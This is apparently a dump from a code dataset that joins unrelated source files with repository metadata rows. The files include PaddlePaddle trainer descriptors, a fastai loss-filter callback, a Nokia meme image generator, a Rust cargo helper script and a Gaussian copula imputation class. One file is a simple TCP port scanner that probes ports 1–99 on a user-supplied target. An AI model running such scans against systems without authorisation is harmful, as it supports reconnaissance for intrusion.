# [[30,10],[50,10],[35,15],[40,30],[30,30]]
# ]
s[:50] # ,lingjian['零件号'].values
)
if n.shapes_max_length > BIN_WIDTH:
BIN_NORMAL[2][0] = n.shapes_max_length
BIN_NORMAL[3][0] = n.shapes_max_length
    # select the container (sheet) to pack into
n.add_container(BIN_NORMAL)
    # run the computation
    n.run()  # run one pass without generating offspring
    # set up the exit condition
res_list = list()
best = n.best
    # place everything into a single container
# set_target_loop(best, n) # T6
    # loop for a fixed number of iterations
content_loop_rate(best, n, loop_time=LOOP_TIME - 1) # T7 , T4
| 24.02 | 66 | 0.565362 |
4a27e9fc7f2c4b7c99689da35bed05009b02b4be | 184 | py | Python | domain/rastrigin/rastrigin_ValidateChildren.py | Sascha0912/SAIL | 5dfb8d0b925d5e61933bf10591d959433fffaf26 | [
"MIT"
] | 2 | 2019-03-12T10:21:54.000Z | 2019-07-17T14:56:33.000Z | domain/rastrigin/rastrigin_ValidateChildren.py | Sascha0912/SAIL | 5dfb8d0b925d5e61933bf10591d959433fffaf26 | [
"MIT"
] | null | null | null | domain/rastrigin/rastrigin_ValidateChildren.py | Sascha0912/SAIL | 5dfb8d0b925d5e61933bf10591d959433fffaf26 | [
"MIT"
] | 1 | 2020-08-31T07:22:09.000Z | 2020-08-31T07:22:09.000Z | import numpy as np
def rastrigin_ValidateChildren(children, d):
validInds = np.full(children.shape[0], True)
# print("validChilds")
# print(validInds)
return validInds | 26.285714 | 48 | 0.711957 |
4a27ea3fd8871d3b3a5c62582c7cc65b2144c3c1 | 10,332 | py | Python | python/paddle/fluid/trainer_desc.py | 0YuanZhang0/Paddle | 118e585b8c28e56da6c39c2fcf21002625a67934 | [
"Apache-2.0"
] | 2 | 2020-02-11T08:53:05.000Z | 2020-02-20T08:06:25.000Z | python/paddle/fluid/trainer_desc.py | xixiaoyao/Paddle | a2e10930cf2781b58875abb9c475375e1282e575 | [
"Apache-2.0"
] | null | null | null | python/paddle/fluid/trainer_desc.py | xixiaoyao/Paddle | a2e10930cf2781b58875abb9c475375e1282e575 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of trainers."""
import sys
from os import path
__all__ = ['TrainerDesc', 'MultiTrainer', 'DistMultiTrainer', 'PipelineTrainer']
class TrainerDesc(object):
'''
Set proto from python to c++.
Can be initialized from train_desc.
'''
def __init__(self):
'''
self.proto_desc = data_feed_pb2.DataFeedDesc()
with open(proto_file, 'r') as f:
text_format.Parse(f.read(), self.proto_desc)
'''
# Workaround for relative import in protobuf under python3
# TODO: should be fixed
cur_path = path.dirname(__file__)
sys.path.append(cur_path)
sys.path.append(cur_path + "/proto")
from proto import trainer_desc_pb2
self.proto_desc = trainer_desc_pb2.TrainerDesc()
import multiprocessing as mp
# set default thread num == cpu count
self.proto_desc.thread_num = mp.cpu_count()
self._fleet_desc = None
self._device_worker = None
self._program = None
self._infer = False
def _set_fetch_var_and_info(self, fetch_vars, fetch_info, print_period):
for i, v in enumerate(fetch_vars):
self.proto_desc.fetch_config.fetch_var_names.extend([v.name])
self.proto_desc.fetch_config.fetch_var_str_format.extend(
[fetch_info[i]])
self.proto_desc.fetch_config.print_period = print_period
def _set_debug(self, debug):
self.proto_desc.debug = debug
def _set_thread(self, thread_num):
self.proto_desc.thread_num = thread_num
def _set_device_worker(self, device_worker):
self._device_worker = device_worker
def _set_infer(self, infer):
self._infer = infer
def _set_fleet_desc(self, fleet_desc):
self._fleet_desc = fleet_desc
def _gen_trainer_desc(self):
pass
def _set_program(self, program):
self._program = program
def _set_use_cvm(self, use_cvm=False):
self.proto_desc.use_cvm = use_cvm
def _set_no_cvm(self, no_cvm=False):
self.proto_desc.no_cvm = no_cvm
def _set_scale_datanorm(self, scale_datanorm=-1):
self.proto_desc.scale_datanorm = scale_datanorm
def _set_dump_slot(self, dump_slot):
self.proto_desc.dump_slot = dump_slot
def _set_mpi_rank(self, mpi_rank):
self.proto_desc.mpi_rank = mpi_rank
def _set_mpi_size(self, mpi_size):
self.proto_desc.mpi_size = mpi_size
def _set_dump_fields(self, dump_fields):
for field in dump_fields:
self.proto_desc.dump_fields.append(field)
def _set_dump_fields_path(self, path):
self.proto_desc.dump_fields_path = path
def _set_dump_file_num(self, dump_file_num):
self.proto_desc.dump_file_num = dump_file_num
def _set_dump_converter(self, converter):
self.proto_desc.dump_converter = converter
def _set_dump_param(self, dump_param):
for param in dump_param:
self.proto_desc.dump_param.append(param)
def _set_thread_barrier(self, thread_barrier):
self.proto_desc.thread_barrier = thread_barrier
def _set_check_nan_var_names(self, check_nan_var_names):
for var in check_nan_var_names:
self.proto_desc.check_nan_var_names.append(var)
def _set_loss_names(self, loss_names):
for loss in loss_names:
self.proto_desc.loss_names.append(loss)
def _set_adjust_ins_weight(self, config_dict):
self.proto_desc.adjust_ins_weight_config.need_adjust = \
config_dict.get("need_adjust", False)
self.proto_desc.adjust_ins_weight_config.nid_slot = \
config_dict.get("nid_slot", "")
self.proto_desc.adjust_ins_weight_config.nid_adjw_threshold = \
config_dict.get("nid_adjw_threshold", 0.0)
self.proto_desc.adjust_ins_weight_config.nid_adjw_ratio = \
config_dict.get("nid_adjw_ratio", 0.0)
self.proto_desc.adjust_ins_weight_config.ins_weight_slot = \
config_dict.get("ins_weight_slot", "")
def _set_copy_table_config(self, config_dict):
config = self.proto_desc.copy_table_config
config.need_copy = config_dict.get("need_copy", False)
config.batch_num = config_dict.get("batch_num", 100)
src_sparse_tables = config_dict.get("src_sparse_tables", [])
if not isinstance(src_sparse_tables, list):
src_sparse_tables = [src_sparse_tables]
dest_sparse_tables = config_dict.get("dest_sparse_tables", [])
if not isinstance(dest_sparse_tables, list):
dest_sparse_tables = [dest_sparse_tables]
if len(src_sparse_tables) != len(dest_sparse_tables):
raise ValueError(
"len(src_sparse_tables) != len(dest_sparse_tables)," \
" %s vs %s" % (len(src_sparse_tables), \
len(dest_sparse_tables)))
for i in src_sparse_tables:
config.src_sparse_tables.append(i)
for i in dest_sparse_tables:
config.dest_sparse_tables.append(i)
src_dense_tables = config_dict.get("src_dense_tables", [])
if not isinstance(src_dense_tables, list):
src_dense_tables = [src_dense_tables]
dest_dense_tables = config_dict.get("dest_dense_tables", [])
if not isinstance(dest_dense_tables, list):
dest_dense_tables = [dest_dense_tables]
if len(src_dense_tables) != len(dest_dense_tables):
raise ValueError(
"len(src_dense_tables) != len(dest_dense_tables)," \
" %s vs %s" % (len(src_dense_tables), \
len(dest_dense_tables)))
for i in src_dense_tables:
config.src_dense_tables.append(i)
for i in dest_dense_tables:
config.dest_dense_tables.append(i)
        # user can also specify dense variables to copy,
        # instead of copying the dense table
src_var_list = config_dict.get("src_var_list", [])
if not isinstance(src_var_list, list):
src_var_list = [src_var_list]
dest_var_list = config_dict.get("dest_var_list", [])
if not isinstance(dest_var_list, list):
dest_var_list = [dest_var_list]
if len(src_var_list) != len(dest_var_list):
raise ValueError(
"len(src_var_list) != len(dest_var_list), %s vs" \
" %s" % (len(src_var_list), len(dest_var_list)))
for i in src_var_list:
config.src_var_list.append(i)
for i in dest_var_list:
config.dest_var_list.append(i)
dependency_map = config_dict.get("dependency_map", {})
for key in dependency_map:
m = config.table_denpendency_map.add()
m.key = key
values = dependency_map[key]
if not isinstance(values, list):
values = [values]
if len(values) != 1:
raise ValueError("dependency len %s != 1" % len(values))
for value in values:
m.values.append(value)
config.dense_pull_after_copy = \
config_dict.get("dense_pull_after_copy", True)
config.enable_dependency = \
config_dict.get("enable_dependency", False)
config.sparse_copy_by_feasign = \
config_dict.get("sparse_copy_by_feasign", True)
def _desc(self):
from google.protobuf import text_format
return self.proto_desc.SerializeToString()
def __str__(self):
from google.protobuf import text_format
return text_format.MessageToString(self.proto_desc)
class MultiTrainer(TrainerDesc):
'''
    Implementation of MultiTrainer.
    Can be initialized from TrainerDesc.
'''
def __init__(self):
super(MultiTrainer, self).__init__()
pass
def _set_program(self, program):
super(MultiTrainer, self)._set_program(program)
self._program = program
def _gen_trainer_desc(self):
super(MultiTrainer, self)._gen_trainer_desc()
self.proto_desc.class_name = "MultiTrainer"
self._device_worker._set_infer(self._infer)
self._device_worker._set_program(self._program)
self._device_worker._gen_worker_desc(self.proto_desc)
class DistMultiTrainer(TrainerDesc):
"""
    Implementation of DistMultiTrainer.
It's for Distributed training.
"""
def __init__(self):
super(DistMultiTrainer, self).__init__()
pass
def _set_program(self, program):
super(DistMultiTrainer, self)._set_program(program)
self._program = program
def _gen_trainer_desc(self):
super(DistMultiTrainer, self)._gen_trainer_desc()
self.proto_desc.class_name = "DistMultiTrainer"
        if self._program is None:
raise RuntimeError("None Program")
self._device_worker._set_infer(self._infer)
self._device_worker._set_program(self._program)
self._device_worker._gen_worker_desc(self.proto_desc)
class PipelineTrainer(TrainerDesc):
"""
    Implementation of PipelineTrainer.
It's for Pipeline.
"""
def __init__(self):
super(PipelineTrainer, self).__init__()
pass
def _set_program(self, program):
super(PipelineTrainer, self)._set_program(program)
self._program = program
def _gen_trainer_desc(self):
super(PipelineTrainer, self)._gen_trainer_desc()
self.proto_desc.class_name = "PipelineTrainer"
        if self._program is None:
raise RuntimeError("None Program")
self._device_worker._set_infer(self._infer)
self._device_worker._set_program(self._program)
self._device_worker._gen_worker_desc(self.proto_desc)
| 36.508834 | 80 | 0.662698 |
4a27ea4b044e7fdd3deef98f9bec5b156c57f587 | 3,587 | py | Python | fastai_extensions/exp/nb_BatchLossFilter.py | leoitcode/bugslife | bc2af0816bc37320a5125f9d901e98503d24b6fe | [
"MIT"
] | 1 | 2020-01-25T19:03:17.000Z | 2020-01-25T19:03:17.000Z | fastai_extensions/exp/nb_BatchLossFilter.py | leoitcode/bugslife | bc2af0816bc37320a5125f9d901e98503d24b6fe | [
"MIT"
] | 8 | 2020-03-07T02:35:28.000Z | 2022-03-12T00:13:16.000Z | fastai_extensions/exp/nb_BatchLossFilter.py | leoitcode/bugslife | bc2af0816bc37320a5125f9d901e98503d24b6fe | [
"MIT"
] | null | null | null | #AUTOGENERATED! DO NOT EDIT! file to edit: ./BatchLossFilter.ipynb (unless otherwise specified)
import torch
import numpy as np
from fastai.basic_train import *
import functools
from functools import partial
import warnings
warnings.filterwarnings("ignore", category=UserWarning, module="torch.nn.functional")
from IPython.display import display, HTML
display(HTML("<style>.container { width:100% !important; }</style>"))
import math
from fastai.torch_core import add_metrics
class BatchLossFilterCallback(LearnerCallback):
_order = -20
def __init__(self, learn:Learner, min_sample_perc:float=0., min_loss_perc:float=0.):
super().__init__(learn)
assert min_sample_perc >0. or min_loss_perc > 0., 'min_sample_perc <= 0 and min_loss_perc <= 0'
self.min_sample_perc, self.min_loss_perc = min_sample_perc, min_loss_perc
self.learn = learn
self.model = learn.model
self.crit = learn.loss_func
if hasattr(self.crit, 'reduction'): self.red = self.crit.reduction
self.sel_losses_sum, self.losses_sum = 0., 0.
self.sel_samples, self.samples = 0., 0.
self.recorder.add_metric_names(["loss_perc", "samp_perc"])
def on_epoch_begin(self, **kwargs):
"Set the inner value to 0."
self.sel_losses_sum, self.losses_sum = 0., 0.
self.sel_samples, self.samples = 0., 0.
def on_batch_begin(self, last_input, last_target, train, epoch, **kwargs):
if not train or epoch == 0: return
if hasattr(self.crit, 'reduction'): setattr(self.crit, 'reduction', 'none')
with torch.no_grad(): self.losses = np.array(self.crit(self.model(last_input), last_target).cpu())
if hasattr(self.crit, 'reduction'): setattr(self.crit, 'reduction', self.red)
self.get_loss_idxs()
self.sel_losses_sum += self.losses[self.idxs].sum()
self.losses_sum += self.losses.sum()
self.sel_samples += len(self.idxs)
self.samples += len(self.losses)
return {"last_input": last_input[self.idxs], "last_target": last_target[self.idxs]}
def on_epoch_end(self, epoch, last_metrics, **kwargs):
loss_perc = self.sel_losses_sum / self.losses_sum if epoch > 0 else 1.
sample_perc = self.sel_samples / self.samples if epoch > 0 else 1.
return add_metrics(last_metrics, [loss_perc, sample_perc])
def on_train_end(self, **kwargs):
"""At the end of training this calleback will be removed"""
if hasattr(self.learn.loss_func, 'reduction'): setattr(self.learn.loss_func, 'reduction', self.red)
drop_cb_fn(self.learn, 'BatchLossFilterCallback')
def get_loss_idxs(self):
idxs = np.argsort(self.losses)[::-1]
sample_max = math.ceil(len(idxs) * self.min_sample_perc)
self.losses /= self.losses.sum()
loss_max = np.argmax(self.losses[idxs].cumsum() >= self.min_loss_perc) + 1
self.idxs = list(idxs[:max(sample_max, loss_max)])
def drop_cb_fn(learn, cb_name:str)->None:
cbs = []
for cb in learn.callback_fns:
if isinstance(cb, functools.partial): cbn = cb.func.__name__
else: cbn = cb.__name__
if cbn != cb_name: cbs.append(cb)
learn.callback_fns = cbs
Learner.drop_cb_fn = drop_cb_fn
def batch_loss_filter(learn:Learner, min_sample_perc:float=0., min_loss_perc:float=.9)->Learner:
learn.callback_fns.append(partial(BatchLossFilterCallback, min_sample_perc=min_sample_perc,
min_loss_perc=min_loss_perc))
return learn
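# Usage sketch (assumes a fastai v1 Learner named `learn`; `batch_loss_filter` is attached to
# Learner just below):
#   learn = learn.batch_loss_filter(min_sample_perc=0.1, min_loss_perc=0.9)
#   learn.fit_one_cycle(5)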
Learner.batch_loss_filter = batch_loss_filter | 43.216867 | 108 | 0.684974 |
4a27ea920e7dc49afdce00257497b306e2048fa2 | 196 | py | Python | als_to_midi/__init__.py | kovaacs/als_to_midi | 116b7a5a55f140b2a5e18402a188bc74e7bd5748 | [
"MIT"
] | null | null | null | als_to_midi/__init__.py | kovaacs/als_to_midi | 116b7a5a55f140b2a5e18402a188bc74e7bd5748 | [
"MIT"
] | null | null | null | als_to_midi/__init__.py | kovaacs/als_to_midi | 116b7a5a55f140b2a5e18402a188bc74e7bd5748 | [
"MIT"
] | null | null | null | import datetime
__author__ = "Marcell Kovacs"
__author_email__ = "[email protected]"
__version__ = datetime.datetime.now().strftime('%y.%m.%d')
__description__ = "Extract MIDI from ALS files"
| 28 | 58 | 0.765306 |
4a27ead303274a96e3eaa26d288cf1540cca3654 | 647 | py | Python | FitLib/FunctionsLibrary/General.py | skelton-group/FitLib | 84481cbcdae2bf0575e162717866b4035187d57a | [
"MIT"
] | null | null | null | FitLib/FunctionsLibrary/General.py | skelton-group/FitLib | 84481cbcdae2bf0575e162717866b4035187d57a | [
"MIT"
] | null | null | null | FitLib/FunctionsLibrary/General.py | skelton-group/FitLib | 84481cbcdae2bf0575e162717866b4035187d57a | [
"MIT"
] | null | null | null | # FitLib/FunctionsLibrary/General.py
# ----------------
# Module Docstring
# ----------------
""" Common functions for fitting. """
# -------
# Imports
# -------
import numpy as np
from FitLib.Function import CreateFunction
# ---------
# Functions
# ---------
def Polynomial(x, *p):
""" General polynomial function y = p[0] * x ^ N + p[1] * x ^ (N - 1) + ... + p[N] """
return np.polyval(p, x)
def CreatePolynomial(p, p_fit = None, p_bounds = None):
""" Return a Function object representing a Polynomial function. """
return CreateFunction(
Polynomial, p, p_fit = p_fit, p_bounds = p_bounds
)
| 18.485714 | 90 | 0.554869 |
4a27ebfcf5f3aca1418e7c2109e3a2f6315a7078 | 2,761 | py | Python | raytracer/raytracer.py | codacy-badger/RayTracer | 64da4c0dce238ee07488966c4103f863a38e411f | [
"MIT"
] | null | null | null | raytracer/raytracer.py | codacy-badger/RayTracer | 64da4c0dce238ee07488966c4103f863a38e411f | [
"MIT"
] | null | null | null | raytracer/raytracer.py | codacy-badger/RayTracer | 64da4c0dce238ee07488966c4103f863a38e411f | [
"MIT"
] | null | null | null | #!/usr/local/bin/python3
import subprocess as sp
import sys, os
from typing import Dict
from distutils.dir_util import copy_tree
def commit(cwd: str, cargo: Dict[str, str]):
gitworkflow = [
["git", "add", "-u"],
["git", "commit", "-m", sys.argv[2]],
["git", "pull", "--rebase"],
["git", "push"]
]
package_name = cargo["package"]["name"]
doc_dir = f"{cwd}/target/doc"
doc_dest_dir = f"{cwd}/docs"
print("Formatting code!")
fmt = sp.check_output(["cargo", "fmt"])
print("Generating docs!")
docs = sp.check_output(["cargo", "doc", "--no-deps", "--document-private-items"])
copy_tree(doc_dir, doc_dest_dir, update=1)
bench = sp.check_output(["cargo", "bench"])
try:
print("Linting code!")
lint = sp.check_output(["cargo", "clippy", "--all-features", "--", "-D", "warnings"])
print("Testing code!")
test = sp.check_output(["cargo", "test"])
except sp.CalledProcessError:
print("Failed!")
else:
print("Commiting changes!")
for cmd in gitworkflow:
sp.call(cmd)
def debug(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "run"] + sys.argv[2:])
def run(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "run", "--release"] + sys.argv[2:])
def test(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "test"] + sys.argv[2:])
def fmt(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "fmt"] + sys.argv[2:])
def lint(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "clippy"] + sys.argv[2:])
def doc(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "doc"] + sys.argv[2:])
def bench(cwd: str, cargo:Dict[str, str]):
sp.call(["cargo", "bench"] + sys.argv[2:])
if __name__ == "__main__":
dispatch = {
"commit": commit,
"debug": debug,
"run": run,
"test": test,
"fmt": fmt,
"lint": lint,
"doc": doc,
"bench": bench
}
cwd = os.getcwd()
if not os.path.exists(f"{cwd}/Cargo.toml"):
print("Not inside a crate!")
else:
with open(f"{cwd}/Cargo.toml", 'r') as f:
cargo_lines = filter(lambda s: s != "", map(lambda x: x.strip("\n").strip(), f.readlines()))
cargo = {}
sublevel = None
for l in cargo_lines:
if l[0] == "[":
sublevel = l[1:-1]
cargo[sublevel] = {}
elif sublevel is not None:
split = list(map(lambda x: x.strip(), l.split("=")))
cargo[sublevel][split[0]] = split[1].replace('"', '')
if sys.argv[1] in dispatch.keys():
dispatch[sys.argv[1]](cwd, cargo)
else:
print("No valid arguments supplied!")
| 31.375 | 104 | 0.531329 |
4a27ec34c19265d6d39bda91634bd43e4fa16a80 | 903 | py | Python | portscanner.py | kamalkum9r/python | 04409d6bc531fe102d1006f3a6033c1a44fac539 | [
"MIT"
] | 1 | 2021-07-17T07:30:30.000Z | 2021-07-17T07:30:30.000Z | portscanner.py | kamalkum9r/python | 04409d6bc531fe102d1006f3a6033c1a44fac539 | [
"MIT"
] | null | null | null | portscanner.py | kamalkum9r/python | 04409d6bc531fe102d1006f3a6033c1a44fac539 | [
"MIT"
] | null | null | null | # port scanner
# please dont use it for wrong purposes
import sys
import socket
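# Example run (hypothetical target IP):
#   python3 portscanner.py 192.168.1.10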
print("PORT SCANNER")
if len(sys.argv) == 2:
	target = socket.gethostbyname(sys.argv[1])
else:
	print("Invalid amount of arguments, you must enter the target IP")
	sys.exit()
print("Scanning target: " + target)
try:
for port in range(1,100):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(0.9)
result = s.connect_ex((target,port))
if result ==0:
print("Port {} is open".format(port))
s.close()
except KeyboardInterrupt:
print("\n Exitting Program !!!!")
sys.exit()
except socket.gaierror:
print("\n Hostname Could Not Be Resolved !!!!")
sys.exit()
except socket.error:
print("\ Server not responding !!!!")
sys.exit()
# my instagram username: kamalkum9r | 25.8 | 63 | 0.599114 |
4a27ecbc424bd285fce09aaefd441513f3613f1a | 1,084 | py | Python | kubernetes/test/test_v1beta1_custom_resource_definition.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 1 | 2018-10-20T19:37:57.000Z | 2018-10-20T19:37:57.000Z | kubernetes/test/test_v1beta1_custom_resource_definition.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_v1beta1_custom_resource_definition.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 2 | 2018-07-27T19:39:34.000Z | 2020-12-25T02:48:27.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.11.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1beta1_custom_resource_definition import V1beta1CustomResourceDefinition
class TestV1beta1CustomResourceDefinition(unittest.TestCase):
""" V1beta1CustomResourceDefinition unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1beta1CustomResourceDefinition(self):
"""
Test V1beta1CustomResourceDefinition
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1beta1_custom_resource_definition.V1beta1CustomResourceDefinition()
pass
if __name__ == '__main__':
unittest.main()
| 24.088889 | 110 | 0.741697 |
4a27ee948763d760f453b3f9591ab291b6b0c303 | 213 | py | Python | simple_peewee_flask_webapi/__init__.py | prbpedro/simple_peewee_flask_webapi | 9f70e2cf034d2ff53b6c730f1362e03a37cc9a59 | [
"MIT"
] | null | null | null | simple_peewee_flask_webapi/__init__.py | prbpedro/simple_peewee_flask_webapi | 9f70e2cf034d2ff53b6c730f1362e03a37cc9a59 | [
"MIT"
] | null | null | null | simple_peewee_flask_webapi/__init__.py | prbpedro/simple_peewee_flask_webapi | 9f70e2cf034d2ff53b6c730f1362e03a37cc9a59 | [
"MIT"
] | null | null | null | from simple_peewee_flask_webapi import app_models
from simple_peewee_flask_webapi import simple_table
from simple_peewee_flask_webapi import join_table
from simple_peewee_flask_webapi import application_start
| 42.6 | 57 | 0.906103 |
4a27ef9d66933e1a6c4f915d65f557b6a516bb5c | 2,369 | py | Python | nonebot_plugin_nokia/nokia.py | kexue-z/nonebot-plugin-nokia | c47a5fb79ff1626cc5cddc8e9809f8772c020dad | [
"MIT"
] | 3 | 2021-11-30T10:18:59.000Z | 2022-01-20T07:15:24.000Z | nonebot_plugin_nokia/nokia.py | kexue-z/nonebot-plugin-nokia | c47a5fb79ff1626cc5cddc8e9809f8772c020dad | [
"MIT"
] | null | null | null | nonebot_plugin_nokia/nokia.py | kexue-z/nonebot-plugin-nokia | c47a5fb79ff1626cc5cddc8e9809f8772c020dad | [
"MIT"
] | null | null | null | import base64
from io import BytesIO
from os.path import dirname
from typing import Tuple
from collections import deque
from PIL import Image, ImageFont, ImageDraw, ImageOps
font_size = 70
line_gap = 20
body_pos = (205, 340)
subtitle_pos = (790, 320)
body_color = (0, 0, 0, 255)
subtitle_color = (129, 212, 250, 255)
line_rotate = -9.8
max_line_width = 680
max_content_height = 450
print(dirname(__file__) + "/res/font.ttc")
font = ImageFont.truetype(dirname(__file__) + "/res/font.ttf", font_size)
def image_to_byte_array(image: Image):
    imgByteArr = BytesIO()
image.save(imgByteArr, format=image.format)
imgByteArr = imgByteArr.getvalue()
return imgByteArr
def im_2_b64(pic: Image.Image) -> str:
buf = BytesIO()
pic.save(buf, format="PNG")
base64_str = base64.b64encode(buf.getbuffer()).decode()
return "base64://" + base64_str
def draw_subtitle(im, text: str):
width, height = font.getsize(text)
image2 = Image.new("RGBA", (width, height))
draw2 = ImageDraw.Draw(image2)
draw2.text((0, 0), text=text, font=font, fill=subtitle_color)
image2 = image2.rotate(line_rotate, expand=1)
px, py = subtitle_pos
sx, sy = image2.size
im.paste(image2, (px, py, px + sx, py + sy), image2)
def generate_image(text: str):
origin_im = Image.open(dirname(__file__) + "/res/img.png")
text = text[:900]
length = len(text)
width, height = font.getsize(text)
current_width = 0
lines = []
line = ""
q = deque(text)
while q:
word = q.popleft()
width, _ = font.getsize(word)
current_width += width
if current_width >= max_line_width:
q.appendleft(word)
lines.append(line)
current_width = 0
line = ""
else:
line += word
lines.append(line)
image2 = Image.new("RGBA", (max_line_width, max_content_height))
draw2 = ImageDraw.Draw(image2)
for i, line in enumerate(lines):
y = i * (height + line_gap)
if y > max_content_height:
break
draw2.text((0, y), text=line, font=font, fill=body_color)
image2 = image2.rotate(line_rotate, expand=1)
px, py = body_pos
sx, sy = image2.size
origin_im.paste(image2, (px, py, px + sx, py + sy), image2)
draw_subtitle(origin_im, f"{length}/900")
return im_2_b64(origin_im)
| 28.202381 | 73 | 0.641621 |
4a27efe66b599c8a8649f2e466aade421e5d6a40 | 72,330 | py | Python | gcimpute/gaussian_copula.py | udellgroup/gcimpute | b29650e61785af904a3bff753ffc2995449883cf | [
"MIT"
] | null | null | null | gcimpute/gaussian_copula.py | udellgroup/gcimpute | b29650e61785af904a3bff753ffc2995449883cf | [
"MIT"
] | null | null | null | gcimpute/gaussian_copula.py | udellgroup/gcimpute | b29650e61785af904a3bff753ffc2995449883cf | [
"MIT"
] | null | null | null | from .transform_function import TransformFunction
from .online_transform_function import OnlineTransformFunction
from .embody import _latent_operation_body_, get_truncnorm_moments_vec
from scipy.stats import norm, truncnorm
import numpy as np
import pandas as pd
from concurrent.futures import ProcessPoolExecutor
from scipy.linalg import svdvals
from collections import defaultdict
import warnings
var_type_names = ['continuous', 'ordinal', 'lower_truncated', 'upper_truncated', 'twosided_truncated']
class GaussianCopula():
'''
Gaussian copula model.
This class allows to estimate the parameters of a Gaussian copula model from incomplete data,
and impute the missing entries using the learned model.
Parameters
----------
training_mode: {'standard', 'minibatch-offline', 'minibatch-online'}, default='standard'
String describing the type of training to use. Must be one of:
'standard'
all data are used to estimate the marginals and update the model in each iteration
'minibatch-offline'
all data are used to estimate the marginals, but only a mini-batch's data are used to update the model in each iteration
'minibatch-online'
only recent data are used to estimate the marginals, and only a mini-batch's data are used to update the model in each iteration
tol: float, default=0.01
The convergence threshold. EM iterations will stop when the parameter update ratio is below this threshold.
max_iter: int, default=50
The number of EM iterations to perform.
random_state: int, default=101
Controls the randomness in generating latent ordinal values. Not used if there is no ordinal variable.
n_jobs: int, default=1
The number of jobs to run in parallel.
verbose: int, default=0
Controls the verbosity when fitting and predicting.
0 : silence
1 : information
2 : rich information
3 : debugging
num_ord_updates: int, default=1
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
        We do not recommend using a value larger than 1 (the default value) at this moment: it slows down the run without a clear
        performance improvement.
min_ord_ratio: float, default=0.1
Used for automatic variable type decision. The largest mode frequency for continuous variables.
stepsize_func: a function that takes 1-dim input and return 1-dim output
Only used when (1) training_mode = 'minibatch-offline'; (2) training_mode = 'minibatch-online' and 'const_stepsize=None'.
The supplied function should outputs monotonically decreasing values in the range (0,1) on positive integers
const_stepsize: float in the range (0,1) or None, default is 0.5.
Only used when training_mode = 'minibatch-online'.
num_pass: int or None, default = 2
Only used when training_mode='minibatch-offline'. Used to set max_iter.
batch_size: int, default=100
The number of data points in each mini-batch.
window_size: int, default=200
The lookback window length for online marginal estimate. Only used when training_mode = 'minibatch-online'.
decay: int or None, default=None
The decay rate to be allocated to observations for online imputation. Only used when training_mode = 'minibatch-online'.
realtime_marginal: bool, default=True
Only used when training_mode = 'minibatch-online'.
If set to True, the marginal updates after every row; otherwise, the marginal updates after every batch_size rows.
In comparison, correlation update is conducted after every batch_size rows.
The model runs longer but gives more accurate estimation when set to True.
corr_diff_type: A list with elements from {'F', 'S', 'N'}, default = ['F']
The matrix norm used to compute copula correlation update ratio. Used for detecting change points when training mode = 'minibatch-online'.
Must be one of:
'F'
Frobenius norm
'S'
Spectral norm
'N'
Nuclear norm
Attributes
----------
n_iter_: int
The number of EM iterations conducted.
likelihood: ndarray of shape (n_iter_,)
The model likelihood value at each iteration.
    feature_names: ndarray of shape (n_features,)
        Names of features seen during `fit`.
Methods
-------
fit(X)
Fit a Gaussian copula model on X.
transform(X)
Return the imputed X using the stored model.
fit_transform(X)
Fit a Gaussian copula model on X and return the transformed X.
fit_transform_evaluate(X, eval_func)
Conduct eval_func on the imputed datasets returned after each iteration.
sample_imputation(X)
Return multiple imputed datasets X using the stored model.
get_params()
Get parameters for this estimator.
get_vartypes()
Get the specified variable types used in model fitting.
get_imputed_confidence_interval()
Get the confidence intervals for the imputed missing entries.
get_reliability()
Get the reliability, a relative quantity across all imputed entries, when either all variables are continuous or all variables are ordinal
fit_change_point_test()
Conduct change point test after receiving each data batch.
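    Examples
    --------
    A minimal usage sketch (added for illustration; the data and settings are arbitrary):
        import numpy as np
        rng = np.random.default_rng(0)
        X = rng.normal(size=(200, 5))
        X[rng.random(X.shape) < 0.2] = np.nan     # mask 20% of the entries
        model = GaussianCopula()
        X_imp = model.fit_transform(X)            # fit the copula and impute the missing entries
        corr = model.get_params()['copula_corr']  # estimated copula correlation matrix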
'''
def __init__(self, training_mode='standard', tol=0.01, max_iter=50, random_state=101, n_jobs=1, verbose=0, num_ord_updates=1, min_ord_ratio=0.1, stepsize_func=lambda k, c=5:c/(k+c), const_stepsize=0.5, num_pass=2, batch_size=100, window_size=200, decay=None, realtime_marginal=True, corr_diff_type=['F']):
def check_stepsize():
L = np.array([stepsize_func(x) for x in range(1, max_iter+1, 1)])
if L.min() <=0 or L.max()>=1:
print(f'Step size should be in the range of (0,1). The input stepsize function yields step size from {L.min()} to {L.max()}')
raise
if not all(x>y for x, y in zip(L, L[1:])):
print(f'Input step size is not monotonically decreasing.')
raise
if training_mode == 'minibatch-online':
if const_stepsize is None:
check_stepsize()
self.stepsize = stepsize_func
else:
assert 0<const_stepsize<1, 'const_stepsize must be in the range (0, 1)'
self.stepsize = lambda x, c=const_stepsize: c
elif training_mode == 'minibatch-offline':
check_stepsize()
self.stepsize = stepsize_func
